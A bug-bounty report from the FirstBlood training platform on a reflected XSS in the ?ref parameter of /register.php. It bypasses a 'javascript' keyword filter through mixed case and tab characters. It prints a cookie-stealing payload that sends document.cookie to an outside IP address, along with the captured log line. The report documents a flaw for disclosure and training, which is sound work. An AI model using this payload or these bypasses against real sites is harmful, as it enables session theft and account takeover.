FirstBlood-#759Reflected XSS on register.php leads to account takeover
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, vigilante Level 4 reported:

Summary:

There is a reflected XSS on /register.php page that was vulnerable in V1 and can easily be reproduced in V2. The script executes when a user clicks on the "Return to previous page" button.

V2 of First Blood substitutes the words "javascript" with "nope". This can be bypassed by using "jaVaScript".

This vulnerability can be used for account takeover by stealing user's cookies if the user is logged in.

Steps to Reproduce:

  1. Visit /register.php?ref=jaVaScript:alert(document.domain) and click on "Return to previous page".
  2. The XSS will fire and you'll see an alert box with the document domain.
  3. We can then steal cookies. I am running a python http server on a VPS box that captures the header and url.
  4. Use this payload to steal cookies which send them to my server, navigate to the url again and click on "Return to previous page".

https://d8a1eeb46146-vigilante.a.firstbloodhackers.com/register.php?ref=jaVaScript:window.location.href=`http://165.227.134.100/${document.cookie}`

  1. Captured request. 85.160.6.99 - - [28/Oct/2021 06:45:32] "GET /drps=1d6b68c2ab7581821c793d361 HTTP/1.1" 404 -

Impact

We are able to execute javascript on behalf of a victim that leads to stealing cookies and account takeover.

P3 Medium

Endpoint: /register.php

Parameter: ?ref=

Payload: jaVaScript:window.location.href=`http://165.227.134.100/${document.cookie}`


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.